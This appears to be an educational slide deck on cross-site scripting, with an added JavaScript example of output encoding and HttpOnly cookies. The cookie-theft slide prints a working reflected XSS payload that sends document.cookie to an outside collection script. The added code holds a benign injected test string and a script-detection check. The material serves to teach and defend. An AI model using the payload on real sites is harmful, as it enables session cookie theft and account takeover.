LAÏMOUCHE El Hadj, DAVY Benjamin Information Systems Security Cross Site Scripting source : http://www.cgisecurity.com/articles/xss-faq.shtml
What is Cross Site Scripting ? • User data gathered by a website. • Using malicious code hidden in links, posts on a board or e-mails. • Encoded to be less suspicious : e.g. in HEX.
What do XSS and CSS mean ? • Often people refer to Cross Site Scripting as CSS. • CSS is also used for Cascading Style Sheets. • When you see XSS you can be sure it’s talking about the security threat.
What are the threats of Cross Site Scripting ? • Injection of JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user. • Account theft, tampering with user settings, cookie theft and false advertising are possible.
How to : XSS cookie theft • Target a website using cookies. • Test how it works and where it’s possible to insert code (e.g. enabled HTML in a form). • JavaScript code : http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
How to protect myself ? • Follow links from the main website. • Be careful : XSS can be executed automatically when you open an e-mail, read a guestbook … • Turn off JavaScript. • Encryption is useless.
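The slides show the user-side precautions; the site-side fix for the reflected "variable" parameter on the cookie-theft slide is output encoding plus an HttpOnly session cookie. The following is an added example, not code from the slides or from cgisecurity.com: the a.php-style page name, the input field and the hostile sample value are all assumptions.

```javascript
// Added example (not from the slides): the "variable" query parameter of an
// a.php-style page as a reflected-XSS sink, shown vulnerable and hardened.
// Runs under Node.js with no dependencies.

// Constructed hostile value: closes the value="..." attribute and starts a
// <script> element (a benign stand-in for the slide's cookie-stealing payload).
const HOSTILE_VALUE = '"><script>/*injected*/</script>';

// Vulnerable: the query value is pasted into the HTML unchanged, so the
// browser sees a real <script> element and runs it.
function renderVulnerable(variable) {
  return `<input type="text" name="variable" value="${variable}">`;
}

// Entity-encode every character that can change HTML structure; the browser
// then treats the whole value as text inside the attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, encoded value.
function renderHardened(variable) {
  return `<input type="text" name="variable" value="${escapeHtml(variable)}">`;
}

// Second layer: document.cookie cannot read a cookie flagged HttpOnly, so a
// script that does slip through has no session cookie to send off-site.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Detection aid for tests or log review: does rendered HTML contain a real
// (unencoded) script element?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable:', renderVulnerable(HOSTILE_VALUE));
console.log('hardened:  ', renderHardened(HOSTILE_VALUE));
console.log('Set-Cookie:', sessionCookieHeader('abc123'));
```

The vulnerable render still contains `<script`, the hardened one only `&lt;script&gt;`; encoding must match the context (here an attribute value), since a URL or JavaScript context needs a different encoder.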
How common are XSS holes ? • Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple Computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs. • 10-25 XSS holes are found every month.
It’s over • Any questions ?